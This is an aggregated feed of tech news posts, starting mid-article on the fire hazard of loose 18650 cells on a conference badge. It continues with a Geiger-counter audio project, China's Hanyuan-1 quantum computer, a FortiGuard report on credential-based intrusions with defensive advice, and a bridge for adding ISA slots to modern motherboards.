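$$ I_{\text{sc}} \approx \frac{V_{\text{cell}}}{R_{\text{int}}} = \frac{3.7\ \text{V}}{0.03\ \Omega} \approx 120\ \text{A}, \qquad P \approx I_{\text{sc}}^{2} R_{\text{int}} \approx 430\ \text{W} $$

That’s hundreds of watts dumped into the cell and into whatever is shorting it, which can be ample to make thin metal glow and to push the cell towards thermal runaway.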

The Instructions, They Do Nothing!


WHY sold a little over 3700 tickets. I would not expect 100% attendance, but I’m comfortable saying attendance must’ve been around three thousand people. Sadly, “three thousand people” is far beyond the point at which you can hope to give people handling instructions for something as easy to mishandle as LiIon cells, even for a nominally hacker audience.

Of course, you can try and give people instructions. You can talk to each badge recipient individually, release booklets demonstrating what to do and not to do with a 18650 cell, add silkscreen instructions for a just-in-place reminder, or maybe have them sign a release form, though it’s unlikely that kind of trick would be legal in the EU. Sadly, WHY organizers never came close to doing any of these things. It also wouldn’t really matter if they did. These instructions will always, inevitably be outright ignored by a sizeable percentage of users.

Handling unprotected batteries requires cautiousness and some helper equipment. You can’t hope to transplant the cautiousness; at most, you can try and issue the equipment. Which equipment? Small storage cases for the cells (a must-have when transporting them!), as well as a case for the badge, at the very least; to my knowledge, the WHY didn’t issue either of these as stock. An ESD bag doesn’t qualify if it doesn’t permanently cover the badge’s back, because any temporary protection is nullified by a budding hacker getting tired of carrying two 18650 cells on their neck, and throwing the badge into the tent without looking. Where does it land? Hopefully not onto something metal.

You can build a badge, or any other sort of device, that uses unprotected 18650s and expects the end user to handle them, as the WHY badge does, and it will be more or less safe as long as that end user is yourself, with the 18650 handling experience I’m sure you have to match. Giving it to a friend, caseless? You can talk to your friend and explain 18650 handling basics to them, sure, but you’re still running some degree of risk. My hunch is, your friend could very well refuse such a gift outright. Giving it to a hundred people? You’re essentially playing with fire at someone else’s house.

Just Why Did That Happen?


Hackaday has traditionally used AA cells for our badges, which has definitely helped us avoid most lithium-related issues. Most other conferences have been using pouch cells, which traditionally come with short-circuit protection and don’t threaten to ignite stuff on contact with a piece of metal. 18650 cells are not even cheaper at scale – they’re nice, sure, I wrote as much, but those nice things are quickly negated by the whole “firestarter” thing.

On the other hand, 18650 cells do work for a hacker or a small team of hackers skilled enough to stay cautious, and they also work well at scale when the cell is permanently encased within the shell, as in most powerbanks and laptops. They fail as soon as you expect people to plug batteries in and out, or carry them separately. Respecting Lithium-Ion batteries means being aware of their shortcomings, and for 18650 cells, that means you should avoid having people manually handle them at scale.

Here’s the kicker about the WHY badge situation. I was confused by the WHY badge switching to 18650 cells this year, away from the overcurrent-protected pouch cells which were used by previous iterations of WHY (MCH, SHA) without an issue in sight. So, I asked around, and what I got from multiple sources is that the 18650 decision was pushed top-down, with little regard for physical safety. Sadly, this makes sense – it’s how we saw it implemented, too.


hackaday.com/2025/11/04/lithiu…


Making Audible Sense Of A Radiation Hunt


The clicking of a Geiger counter is well enough known as a signifier of radioactive materials, due to it providing the menacing sound effect any time a film or TV show deals with radiation. What we’re hearing is the electronic detection of an ionization event in a Geiger-Muller tube due to alpha or beta radiation, which is great, but we’re not detecting gamma radiation.

For that a scintillation detector is required, but these are so sensitive to background radiation as to make the clicking effect relatively useless as an indicator to human ears. Could a microcontroller analyse the click rate and produce an audible indication? This is the basis of [maurycyz]’s project, adding a small processor board to a Ludlum radiation meter.

When everything sounds like a lot of clicks, an easy fix might be to use a divider to cut the number down and make concentrations of clicks more obvious. It’s a strategy with merit, but one that results in weaker finds being subsumed. Instead the approach here is to take a long-term background reading, and compare the instantaneous time between clicks with it. Thus any immediate click densities can be highlighted, and those which match the background can be ignored. So in goes an AVR128, for which the code can be found at the above link.
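The actual AVR code lives at the link above, but purely as an illustration of the idea, a sketch of the background-comparison approach might look like this. Here micros() and beep() are hypothetical stand-ins for a free-running microsecond timer and the audio output.

/* Illustrative sketch of the background-comparison idea -- see the
 * linked repository for [maurycyz]'s actual AVR128 code. micros()
 * and beep() are hypothetical hardware stand-ins. */
#include <stdint.h>

extern uint32_t micros(void);
extern void beep(void);

#define BG_SMOOTH 512   /* long time-constant for the background average */

void on_click(void)     /* call from the pulse-input interrupt */
{
    static uint32_t last_click  = 0;
    static uint32_t bg_interval = 1000000; /* µs, seeded at 1 click/s */

    uint32_t now      = micros();
    uint32_t interval = now - last_click;
    last_click = now;

    /* Slow exponential moving average tracks the background click rate */
    int32_t diff = (int32_t)(interval - bg_interval);
    bg_interval += diff / BG_SMOOTH;

    /* Clicks arriving much faster than background get sounded;
     * those consistent with the background are swallowed. */
    if (interval < bg_interval / 4)
        beep();
}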

The result is intended for rock prospecting, a situation where it’s much more desirable to listen to the clicks than to look at the meter as you scan the lumps of dirt. It’s not the first project in this line we’ve brought you; another looked at the scintillation probe itself.


hackaday.com/2025/11/04/making…


Hanyuan-1: The Chinese Quantum Computer That Runs at Room Temperature and Challenges the US


China’s first atomic quantum computer has reached an important commercial milestone, recording its first sales to domestic and international customers, according to state media reports. The Hubei Daily, the state newspaper of China’s Hubei province, reported that the first commercial Hanyuan-1 unit was delivered to a subsidiary of telecommunications provider China Mobile, with an order also coming from Pakistan. The sales were valued at over 40 million yuan (roughly 5 million euros).

Room Temperature and Mass Production


The report states that the Hanyuan-1 is one of the few machines in the emerging field of atomic quantum computing to have reached mass production and worldwide shipment. Development of the machine, which can be used to perform complex calculations such as financial modeling and logistics optimization, was led by the Innovation Academy for Precision Measurement Science and Technology of the Chinese Academy of Sciences, based in central Wuhan.

Using the principles of quantum mechanics, quantum computers can perform calculations and solve complex problems far faster than classical computers. They achieve this using qubits, which can be both 0 and 1 simultaneously thanks to a property called superposition. However, researchers are still struggling to eliminate errors in devices managing millions of qubits.
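In the standard notation, superposition simply means a qubit’s state is a weighted combination of the two basis states, with the weights setting the measurement probabilities:

$$ |\psi\rangle = \alpha|0\rangle + \beta|1\rangle, \qquad |\alpha|^{2} + |\beta|^{2} = 1 $$

A measurement then returns 0 with probability |α|² and 1 with probability |β|².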

With that challenge still unresolved, developers have taken a pragmatic approach, focusing initially on industrial applications involving only a few dozen to a few hundred qubits. These machines are called noisy intermediate-scale quantum (NISQ) computers, and the Hanyuan-1 is one of them. According to the reports, the atomic quantum computer has 100 qubits and achieves “world-class performance standards”.

Unlike other quantum computers that use ions, photons, or “artificial atoms”, the Hanyuan-1 uses electrically neutral atoms as qubits and manipulates them with lasers to perform calculations. The Hanyuan-1 was unveiled in June, marking the culmination of almost 20 years of research and engineering effort that produced not only independence in its core components but also several scientific breakthroughs.

A Focus on Real-World Advanced Applications


Since 2018, the United States has restricted China’s access to certain quantum computing components, such as lasers, spurring China’s progress in the field. The report states that the Wuhan team overcame several challenges to develop a laser meeting high-precision requirements. As a result, the laser is significantly cheaper and uses just one tenth of the power of foreign lasers.

“This achievement breaks China’s dependence on Western supply chains and establishes an independent advantage in atomic quantum computing hardware,” the report reads. Compared with traditional superconducting quantum computers, the atomic machine consumes significantly less energy, is far simpler to maintain, and is “exponentially” cheaper to install.

That’s because the system requires no cryogenic cooling. The entire system fits into three standard racks and operates in an ordinary laboratory environment. The report says the team is preparing to build China’s first atomic quantum computing center capable of supporting highly complex computing requirements, such as financial risk analysis for thousands of corporate users.

The paper quoted an anonymous project manager as saying: “Competition in the industry currently focuses on system practicality and engineering capability rather than on qubit count. We will continue to improve the overall performance of atomic quantum computers, focusing on advanced applications such as drug discovery and materials design.”

From Dependence to Autonomy in Quantum Computing


He added: “Our goal is to deliver scalable atomic computing services by 2027.” The commercialization of the Hanyuan-1 demonstrates China’s rapid progress in quantum computing. Despite US restrictions on technology exports, China has achieved a breakthrough through its own technological development.

In particular, the fact that it requires no cryogenic cooling and is low-cost makes it attractive for commercial use. Superconducting quantum computers require temperatures close to absolute zero, with correspondingly significant operating costs. One quantum computing expert said: “Atomic quantum computers operate at room temperature and are easy to maintain, which makes them extremely practical. However, challenges remain in scaling up the number of qubits and reducing error rates.”

Experts believe China has adopted a strategy centered on the practicality of quantum computing. Rather than competing on qubit count, it is focusing on developing systems with practical applications. The industry expects quantum computing to revolutionize several fields, including finance, drug development, logistics optimization, and cryptography. Commercialization, however, is still expected to take time.

Against the backdrop of intensifying technological competition between the United States and China, quantum computing is becoming another arena of rivalry, after artificial intelligence and semiconductors. The commercialization of the Hanyuan-1 signals that China is beginning to achieve tangible results in this contest.

The article Hanyuan-1: The Chinese Quantum Computer That Runs at Room Temperature and Challenges the US comes from Red Hot Cyber.


Goodbye, Malware! In 2025 Criminal Hackers Break In with Legitimate Accounts to Stay Invisible


A FortiGuard report covering the first half of 2025 shows that financially motivated attackers are increasingly abandoning sophisticated exploits and malware. Instead of deploying tools of their own, they use valid accounts and legitimate remote-access software to penetrate corporate networks undetected.

This approach has proven not only simpler and cheaper, but also significantly more effective: attacks using stolen passwords increasingly evade detection.

The researchers report that in the first six months of the year they investigated dozens of incidents across a range of industries, from manufacturing to finance and telecommunications. Analysis of these cases revealed a recurring pattern: attackers gain access using stolen or purchased credentials, connect via VPN, and then move through the network using remote administration tools such as AnyDesk, Atera, Splashtop, and ScreenConnect.
Prevalence of initial access techniques in the first half of 2025 (source: Fortinet)
This strategy lets them disguise their activity as that of a system administrator and avoid suspicion. FortiGuard’s findings for the same period corroborate this: the password-leak trends documented in open sources match those identified during internal investigations. In essence, attackers don’t need to “hack” systems in the traditional sense of the word: they simply log in using someone else’s credentials, often obtained through phishing or from infostealers sold on underground platforms.

In one attack analyzed, the intruders used valid credentials to connect to a corporate VPN with no multi-factor authentication, then extracted hypervisor passwords saved in the compromised user’s browser and encrypted the virtual machines. In another case, an operator gained access through a stolen domain administrator account and mass-installed AnyDesk across the entire network using RDP and group policy, allowing them to move between systems and remain unnoticed for longer periods. There were also cases in which attackers exploited an old vulnerability in an external-facing server, deployed several remote management tools, and created bogus service accounts to quietly move and then exfiltrate documents.

The analysis showed that password theft remains one of the cheapest and most accessible strategies. The cost of access depends directly on the size and geography of the target company: for organizations with more than a billion dollars in revenue in developed countries it can reach $20,000, while for smaller companies in developing regions it runs to a few hundred dollars. Massive infostealer campaigns provide a steady stream of fresh data, and the low barrier to entry makes such attacks attractive even to less skilled groups.

The main advantage of this scheme is stealth. Attacker behavior is indistinguishable from that of legitimate employees, especially when they connect during normal working hours and to the same systems.

Security tools focused on scanning for malicious files and suspicious processes often cannot detect anomalies when an attack amounts to nothing more than routine logins and network browsing. Moreover, when data is stolen manually over RDP sessions or via built-in RMM features, it is difficult to trace the transferred files, since such actions leave no obvious network artifacts.

According to FortiGuard’s observations, attackers involved in these campaigns continue to make active use of Mimikatz and its variants to extract passwords from memory, and still use the Zerologon exploit for privilege escalation. At times they also manually deploy utilities such as GMER, renamed as “system tools”, to hide their presence.

FortiGuard stresses that defending against such threats requires rethinking the usual approaches. Relying solely on traditional EDR systems that analyze malicious code no longer guarantees reliable protection. A strategy built around accounts and user behavior is becoming more effective.

Companies need to build profiles of their own normal activity and respond promptly to deviations, such as logins from unusual geographic locations, simultaneous connections to multiple servers, or activity outside working hours.
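By way of illustration only, and emphatically not Fortinet’s tooling, the skeleton of such a baseline-and-deviation check could look like the following toy program, with made-up accounts and a per-user “usual country and working hours” profile standing in for a real behavioral baseline.

/* Toy illustration of baseline-and-deviation login checking -- not
 * FortiGuard's tooling. Each user has a learned "usual" country and
 * working-hour window; logins outside either raise an alert. */
#include <stdio.h>
#include <string.h>

struct baseline {
    const char *user;
    const char *usual_country;
    int work_start, work_end;   /* usual login hours, 24 h clock */
};

struct login {
    const char *user;
    const char *country;
    int hour;
};

static const struct baseline profiles[] = {
    { "alice", "NL", 8, 18 },
    { "bob",   "DE", 7, 17 },
};

static void check_login(const struct login *ev)
{
    for (size_t i = 0; i < sizeof profiles / sizeof profiles[0]; i++) {
        const struct baseline *b = &profiles[i];
        if (strcmp(b->user, ev->user) != 0)
            continue;
        if (strcmp(b->usual_country, ev->country) != 0)
            printf("ALERT: %s logged in from unusual country %s\n",
                   ev->user, ev->country);
        if (ev->hour < b->work_start || ev->hour > b->work_end)
            printf("ALERT: %s logged in off-hours (%02d:00)\n",
                   ev->user, ev->hour);
        return;
    }
    printf("ALERT: login for unknown account %s\n", ev->user);
}

int main(void)
{
    const struct login events[] = {
        { "alice",   "NL", 9 },  /* normal */
        { "alice",   "RO", 3 },  /* unusual country, off-hours */
        { "mallory", "US", 12 }, /* no baseline at all */
    };
    for (size_t i = 0; i < sizeof events / sizeof events[0]; i++)
        check_login(&events[i]);
    return 0;
}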

Particular attention is recommended for multi-factor authentication, not just at the external perimeter but also inside the network. Even if an attacker obtains a password, requiring additional authentication will slow their progress and create more chances of being spotted. It is also important to limit administrator privileges, prevent the use of privileged accounts over VPN, and monitor their movement within the infrastructure.

FortiGuard advises organizations to strictly control the use of remote administration tools. If such programs are not needed for business reasons, they should be blocked, and any new installations or network connections associated with them monitored. It also recommends disabling SSH, RDP, and WinRM on all systems where they are not required, and configuring alerts for when those services are re-enabled. According to the analysts, such measures can catch even covert attempts at lateral movement within the network.

The article Goodbye, Malware! In 2025 Criminal Hackers Break In with Legitimate Accounts to Stay Invisible comes from Red Hot Cyber.


Adding ISA Ports To Modern Motherboards


Modern motherboards don’t come with ISA slots, and almost everybody is fine with that. If you really want one, though, there are ways to get one. [TheRasteri] explains how in a forum post on the topic.

Believe it or not, some post-2010 PC hardware can still do ISA; it’s just that the slots aren’t broken out or populated on consumer hardware. However, if you know where to look, you can hack in an ISA hookup to get your old hardware going. [TheRasteri] achieves this on motherboards that expose the LPC bus, with the use of a custom PCB featuring the Fintek F85226 LPC-to-ISA bridge. This allows old ISA cards to be installed in a much more modern PC, with [TheRasteri] noting that DMA is fully functional with this setup—important for some applications. Testing thus far has involved a Socket 775 motherboard and a Socket 1155 motherboard, and [TheRasteri] believes this technique could work on newer hardware too, as long as legacy BIOS or CSM support is available.
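Software-wise, nothing exotic is required: ISA cards are addressed through the legacy x86 I/O port space, and the bridge forwards exactly those port cycles. Purely as an illustration of that kind of access, and not [TheRasteri]’s code, here is a minimal Linux sketch, where 0x300 is a hypothetical card base address.

/* Minimal illustration of legacy x86 port I/O of the sort an ISA card
 * decodes. CARD_BASE is a hypothetical card address; run as root. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/io.h>

#define CARD_BASE 0x300

int main(void)
{
    /* Ask the kernel for access to 8 I/O ports starting at CARD_BASE */
    if (ioperm(CARD_BASE, 8, 1) != 0) {
        perror("ioperm (are you root?)");
        return EXIT_FAILURE;
    }

    outb(0x42, CARD_BASE);                 /* write a byte to the card */
    unsigned char v = inb(CARD_BASE + 1);  /* read a status byte back */
    printf("Read 0x%02x from port 0x%03x\n", v, CARD_BASE + 1);

    ioperm(CARD_BASE, 8, 0);               /* drop port access again */
    return 0;
}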

It’s edge case stuff, as few of us are trying to run Hercules graphics cards on Windows 11 machines or anything like that. But if you’re a legacy hardware nut, and you want to see what can be done, you might like to check out [TheRasteri]’s work over on GitHub. Video after the break.

youtube.com/embed/putHMSzu5og?…


hackaday.com/2025/11/03/adding…